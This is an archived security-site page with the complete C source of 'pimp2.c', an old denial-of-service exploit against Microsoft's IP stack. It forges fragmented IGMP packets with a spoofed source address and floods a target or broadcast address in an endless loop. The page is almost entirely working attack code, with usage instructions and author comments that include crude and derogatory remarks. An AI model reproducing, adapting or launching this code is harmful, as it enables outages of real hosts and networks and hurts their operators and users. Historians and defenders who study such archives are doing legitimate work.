Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: pimp2.c

Pimp.c exploits a bug in MS's IP stack




/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
** CRY what messy fucking code.
** now for the gay modification :p
** ** ** ** ** ** ** ** ** ** **/
/**
 ** [gH] pimp2.c by icesk. [gH]
 **
 ** well so much for readble code.
 ** 1. cleaned up the code (prolly took me the longest heh)
 ** 2. add'd src_addr suport.
 ** 3. allows suport of differant igmp2 codes.
 ** 4. interval into wich to send packets (microseconds)
 **/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>

struct igmp
{
        unsigned char igmp_type;
        unsigned char igmp_code;
        unsigned short igmp_cksum;
        struct in_addr igmp_group;
};

#define ERROR(a) {printf("%s\n", a);exit(-1);}

u_long  resolve(char *);

int main(int argc, char *argv[])
{
 int nsock, ctr, flud;
 char *pkt, *data;
 struct ip *nip;
 struct igmp *nigmp;
 struct sockaddr_in s_addr_in;

 flud = 0;
 setvbuf(stdout, NULL, _IONBF, 0);
 if(argc != 6) ERROR("[gH] pimp2.c by icesk. [gH]\n<host|brodcast> <ammount> <src_addr|target>
<igmp code; pimp: 31> <interval>");

 if(atoi(argv[2]) == 0) { flud = 1; }
 nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
 pkt = malloc(1500);

 memset(&s_addr_in, 0, sizeof(s_addr_in));
 memset(pkt, 0, 1500);

 nip = (struct ip *) pkt;
 nigmp = (struct igmp *) (pkt + sizeof(struct ip));
 data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
 memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));

 s_addr_in.sin_addr.s_addr = resolve(argv[1]);

 nip->ip_v  = 4;
 nip->ip_hl  = 5;
 nip->ip_tos  = 0;
 nip->ip_id  = 69;
 nip->ip_ttl  = 255;
 nip->ip_p  = IPPROTO_IGMP;
 nip->ip_sum  = 0;
 nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
 nip->ip_src.s_addr = resolve(argv[3]);
 nigmp->igmp_type = 2;
 nigmp->igmp_code = atoi(argv[4]);
 nigmp->igmp_cksum = 0;

 inet_aton("128.1.1.1", &nigmp->igmp_group);

 for(ctr = 0;ctr < atoi(argv[2]);ctr++) {
   printf("...\r");
   nip->ip_len  = 1500;
   nip->ip_off  = htons(IP_MF);
   sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
   nip->ip_off  = htons(1480/8)|htons(IP_MF);
   sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
   nip->ip_off  = htons(5920/8)|htons(IP_MF);
   sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
   nip->ip_len   = 831;
   nip->ip_off  = htons(7400/8);
   sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
 }
 {
  printf("packets sent\nentering flood mode to finish it off [crtl+c to finish]\n");
  while(1){
    nip->ip_len  = 1500;
    nip->ip_off  = htons(IP_MF);
    sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
    usleep(atoi(argv[5]));
    nip->ip_off  = htons(1480/8)|htons(IP_MF);
    sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
    usleep(atoi(argv[5]));
    nip->ip_off  = htons(5920/8)|htons(IP_MF);
    sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
    usleep(atoi(argv[5]));
    nip->ip_len   = 831;
    nip->ip_off  = htons(7400/8);
    sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,sizeof(s_addr_in));
    usleep(atoi(argv[5]));
  }
  shutdown(nsock, 2);
 }
}
u_long resolve(char *host)
{
        struct hostent *he;
        u_long ret;

        if(!(he = gethostbyname(host)))
        {
                herror("gethostbyname()");
                exit(-1);
        }
        memcpy(&ret, he->h_addr, sizeof(he->h_addr));
        return ret;
}


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH